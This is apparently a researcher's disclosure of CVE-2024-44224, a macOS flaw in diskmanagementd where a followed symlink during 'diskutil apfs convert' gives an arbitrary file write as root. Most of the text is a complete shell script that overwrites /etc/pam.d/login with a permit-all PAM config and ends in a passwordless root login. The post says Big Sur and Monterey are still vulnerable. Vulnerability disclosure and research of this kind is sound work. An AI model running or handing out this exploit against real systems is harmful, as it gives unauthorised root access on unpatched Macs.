When running diskutil apfs convert with -prebootSource, legacy macOS boot files are copied to a "staging" folder for the new Preboot volume. The copy follows symlinks, so a symlink planted at the destination path inside the staging folder redirects the write to wherever the link points, outside the staging folder.
The copying is done by diskmanagementd, which runs as root, turning a minor bug into an arbitrary file write as root. Overwriting a single file that root trusts (the PAM configuration for login, in the script below) is enough to escalate privileges.
After reporting this in September 2024, I received an Apple Security Bounty, and the bug was fixed in macOS 13.7.2, macOS 14.7.2, and macOS 15.2:
Impact: A malicious app may be able to gain root privileges
Description: A permissions issue was addressed with additional restrictions.
CVE-2024-44224: Amy (@asentientbot)
Big Sur and Monterey are still vulnerable.
Once again, emma (916253) and ASentientHedgehog helped test.
They're also really cool in general, please go follow them.
The following shell script will log in as root on affected versions.
#!/bin/bash
# Build a throwaway RAM disk so no real drive is touched.
wholeDevice="$(hdiutil attach -nomount ram://10000000 | grep -E -o 'disk[0-9]+')"
mainName="$(mktemp -u evilXXXXX)"
bootName="$(mktemp -u bootXXXXX)"
# GPT layout: s1 is the EFI partition, s2 the JHFS+ volume that will be converted to APFS,
# s3 an unformatted Apple_Boot partition where the legacy boot files are looked for.
diskutil partitiondisk "$wholeDevice" gpt jhfs+ "$mainName" 1g %Apple_Boot% %noformat% r
mainDevice="${wholeDevice}s2"
bootDevice="${wholeDevice}s3"
newfs_hfs -v "$bootName" "$bootDevice"
diskutil mount "$bootDevice"
# Where diskmanagementd reads the legacy boot files from, and where it copies them to.
bugInput="/Volumes/$bootName/com.apple.boot.R/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations"
bugOutput="/Volumes/$mainName/staging/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations"
mkdir -p "$bugInput"
mkdir -p "$(dirname "$bugOutput")"
# The "boot file" to be copied: a PAM config for login that accepts anything.
echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > "$bugInput/login"
# Make the destination directory a symlink to /etc/pam.d. The copy runs as root and
# follows it, so the file above lands at /etc/pam.d/login.
ln -s /etc/pam.d "$bugOutput"
diskutil apfs convert "$mainDevice" -prebootSource "/Volumes/$mainName/staging"
# /etc/pam.d/login now permits everything, so this gives a root shell without a password.
login root